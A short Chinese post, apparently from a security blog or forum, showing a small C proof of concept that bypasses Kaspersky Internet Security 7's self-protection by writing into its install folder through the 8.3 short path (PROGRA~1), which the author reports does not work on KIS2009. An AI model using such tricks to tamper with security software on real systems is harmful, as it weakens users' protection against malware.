突破卡巴7文件保护写文件

文章作者：langouster

突发灵感，发现一个卡巴的小BUG，没什么用，更没什么技术含量，高手飘过。

在开启卡巴自我防护的情况下，我们是不能在卡巴的安装写或修改文件的，但利用点小技巧还是可以绕过的。

代码如下：

int _tmain(int argc, _TCHAR* argv[])
{
DWORD retsize;
BOOL ret;

char Path[MAX_PATH]="C://Program Files//Kaspersky Lab//Kaspersky Internet Security 7.0//1.txt";
char Path2[MAX_PATH]="C://PROGRA~1//Kaspersky Lab//Kaspersky Internet Security 7.0//2.txt";


printf("try createfile %s /n",Path);
HANDLE hFile=CreateFile(Path,GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ,NULL,OPEN_ALWAYS,NULL,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{
  printf("CreateFile Error:%d/n",GetLastError());
}
else
{
  printf("ok/n");
  ret=WriteFile(hFile,"test",1,&retsize,NULL);
  CloseHandle(hFile);
}


printf("try createfile %s /n",Path2);
hFile=CreateFile(Path2,GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ,NULL,OPEN_ALWAYS,NULL,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{
  printf("CreateFile Error:%d/n",GetLastError());
}
else
{
  printf("ok/n");
  ret=WriteFile(hFile,"test",1,&retsize,NULL);
  CloseHandle(hFile);
}


return 0;
}

只在kis7.0.0.125 和kis2009上测试，对kis2009无效。